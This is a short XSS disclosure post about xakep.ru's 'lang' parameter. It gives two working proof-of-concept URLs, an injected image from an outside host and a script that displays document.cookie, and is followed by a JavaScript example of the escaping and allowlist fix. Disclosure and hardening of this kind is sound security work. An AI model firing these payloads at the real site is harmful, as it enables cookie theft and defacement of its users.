Xakep.ru XSS bug

Vulnerable page: https://xakep.ru/

PoC
https://xakep.ru/soon/?lang="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://xakep.ru/soon/?lang="><script>alert(document.cookie)</script>

The value of the lang parameter is reflected in the response unescaped, so arbitrary HTML or script can be injected directly through a GET request.
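
The server-side fix for this kind of reflection, as an added example (not code from xakep.ru or from the original post). It assumes the lang value is written into a quoted HTML attribute, which the "> prefix in the PoCs suggests; the function names, the template and the ru/en allowlist are hypothetical.

```javascript
// Added example: names, template and allowlist are assumptions, not xakep.ru's code.
const ALLOWED_LANGS = new Set(["ru", "en"]); // assumed set of supported languages

// Encode the characters that are significant in HTML text and quoted attributes.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Pattern the PoCs imply: the raw parameter is concatenated into an attribute.
function renderUnsafe(query) {
  const lang = new URLSearchParams(query).get("lang") ?? "";
  return '<html lang="' + lang + '">';
}

// Hardened: allowlist the value first, then encode on output anyway.
function renderSafe(query) {
  const requested = new URLSearchParams(query).getAll("lang");
  // Duplicated parameters or values outside the allowlist fall back to the default.
  const ok = requested.length === 1 && ALLOWED_LANGS.has(requested[0]);
  const lang = ok ? requested[0] : "ru";
  return '<html lang="' + escapeHtml(lang) + '">';
}

// True if the fragment contains any opening tag besides the expected <html ...>.
function hasInjectedTag(fragment) {
  const tags = fragment.match(/<[a-zA-Z][^>]*>/g) || [];
  return tags.length !== 1;
}

// Constructed inputs: the query string of the second PoC above and a benign one.
const samples = [
  'lang="><script>alert(document.cookie)</script>',
  "lang=en",
];
for (const q of samples) {
  console.log(JSON.stringify(q),
    "unsafe injected:", hasInjectedTag(renderUnsafe(q)),
    "safe injected:", hasInjectedTag(renderSafe(q)));
}
```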





Note: This is a proof of concept and it doesn't reflect the views or interests of the above websites.
Written by RoLex on 2018-03-09 22:40
